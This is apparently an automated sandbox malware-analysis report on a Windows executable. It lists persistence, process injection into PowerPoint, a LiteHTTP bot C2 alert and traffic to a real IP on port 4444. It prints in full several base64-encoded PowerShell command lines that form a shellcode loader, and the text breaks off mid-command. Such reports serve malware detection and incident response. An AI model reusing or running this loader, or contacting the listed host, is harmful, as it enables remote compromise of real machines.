Energie-DIAPOxcod..exe
This report is generated from a file or URL submitted to this webservice on November 20th 2017 23:37:39 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v7.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Uses network protocols on unusual ports
- Spyware
- POSTs files to a webserver
- Stealer/Phishing
- Scans for artifacts that may help identify the target
- Persistence
-
Modifies auto-execute functionality by setting/creating a value in the registry
Spawns a lot of processes
Writes data to a remote process - Fingerprint
-
Reads the active computer name
Reads the cryptographic machine GUID
Reads the windows installation date
Scans for artifacts that may help identify the target - Evasive
- Tries to sleep for a long time (more than two minutes)
- Spreading
- Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
- Contacts 1 domain and 2 hosts. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 5
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin" (SID: 2819705, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"<Input Sample>" wrote 32 bytes to a remote process "%TEMP%\0XP.exe" (Handle: 804)
"<Input Sample>" wrote 52 bytes to a remote process "%TEMP%\0XP.exe" (Handle: 804)
"<Input Sample>" wrote 4 bytes to a remote process "%TEMP%\0XP.exe" (Handle: 804)
"<Input Sample>" wrote 4 bytes to a remote process "%PROGRAMFILES%\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
"<Input Sample>" wrote 1500 bytes to a remote process "C:\PROGRA~1\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
"<Input Sample>" wrote 32 bytes to a remote process "C:\PROGRA~1\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
"<Input Sample>" wrote 52 bytes to a remote process "C:\PROGRA~1\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Uses network protocols on unusual ports
- details
- TCP traffic to 91.160.159.49 on port 4444
- source
- Network Traffic
- relevance
- 7/10
-
Uses network protocols on unusual ports
-
Spyware/Information Retrieval
-
Scans for artifacts that may help identify the target
- details
- "POWERPNT.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\MESSENGERSERVICE")
- source
- Registry Access
- relevance
- 3/10
-
Scans for artifacts that may help identify the target
-
Unusual Characteristics
-
Spawns a lot of processes
- details
-
Spawned process "<Input Sample>" (Show Process)
Spawned process "0XP.exe" (Show Process)
Spawned process "cmd.exe" with commandline ""cmd /c ""%TEMP%\local.bat" "" (Show Process), Spawned process "mode.com" with commandline "mode con:cols=20 lines=1" (Show Process), Spawned process "powershell.exe" with commandline ""powershell -w 1 -C "sv IY -;sv FI ec;sv CSH ((gv IY).value.toString()+(gv FI).value.toString());powershell (gv CSH).value.toString() 'JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A'"" (Show Process)
Spawned process "POWERPNT.EXE" with commandline ""%TEMP%\energies.ppt"" (Show Process)
Spawned process "powershell.exe" with commandline "-ec JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A" (Show Process)
Spawned process "powershell.exe" with commandline "-ec JABLAEMAawBzACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAb